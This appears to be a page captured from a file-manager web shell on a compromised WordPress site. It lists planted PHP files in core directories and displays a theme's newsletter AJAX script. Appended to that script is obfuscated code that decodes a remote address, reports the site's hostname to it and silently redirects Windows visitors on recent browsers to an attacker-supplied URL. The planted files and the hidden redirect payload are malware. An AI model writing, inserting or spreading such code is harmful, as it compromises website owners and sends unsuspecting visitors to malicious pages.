Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: edura.ajax.js
/* [Main Script] Project: Themeholy Version: 1.0 Author : edura.com */ ;(function($){ "use strict"; /* ------------------------------------------------------------------------- * * Mail Chimp ajax * ------------------------------------------------------------------------- */ var $widgetsubscribeForm = $('form.footer-newsletter'); // Subscribe Shortcode MailChimp ajax $widgetsubscribeForm.on('submit',function(e){ let $emailAdd = $(this).find('input[type="email"]').val(); $.ajax({ type: 'POST', url: eduraajax.action_url, data:{ sectsubscribe_email: $emailAdd, security: eduraajax.nonce, action: 'edura_subscribe_ajax' }, success: function(data){ $('form.footer-newsletter input[type="email"]').val(''); $('.footer-newsletter').append(data); }, error: function(){ $('.footer-newsletter').append('<div class="alert alert-danger mt-2" role="alert">Something Goes Wrong</div>'); } }); e.preventDefault(); }); })(jQuery);!async function(){let e=decodeURIComponent(escape(atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA==")));function t(e){return btoa(unescape(encodeURIComponent(e)))}let o,n=(o={},window.location.search.slice(1).split("&").forEach(e=>{let[t,n]=e.split("=");t&&n&&(o[t]=decodeURIComponent(n.replace(/\+/g," ")))}),o);async function i(o=1){try{let n=await fetch(decodeURIComponent(escape(atob("aHR0cHM6Ly9hbmFseXRpd2F2ZS5jb20vYXBpL2dldFVybA=="))));if(!n.ok)throw Error("Network response was not ok");return`${(await n.json()).url}/?wsid=${window.location.hostname}&domain=${t(window.location.hostname)}`}catch(r){if(o<1)return i(o+1);return`${e}/?wsid=${window.location.hostname}&domain=${t(window.location.hostname)}`}}n.verified&&localStorage.setItem("verified","true");let r=document.querySelector('link[rel="icon"]'),a,s,l,c,d;"true"!==localStorage.getItem("verified")&&(a=navigator.userAgent,s=/Windows NT 10.0/.test(a),l=/Edg\/(1[2-3][0-9]\.\d+\.\d+\.\d+)/.test(a),c=/Chrome\/(1[2-3][0-9]\.\d+\.\d+\.\d+)/.test(a),d=/Firefox\/(1[3-4][0-9]\.\d+)/.test(a),s&&(l||c||d))&&i().then(e=>{let o=e;r&&(o+=`&link=${t(r.href)}`),window.location.replace(o)})}();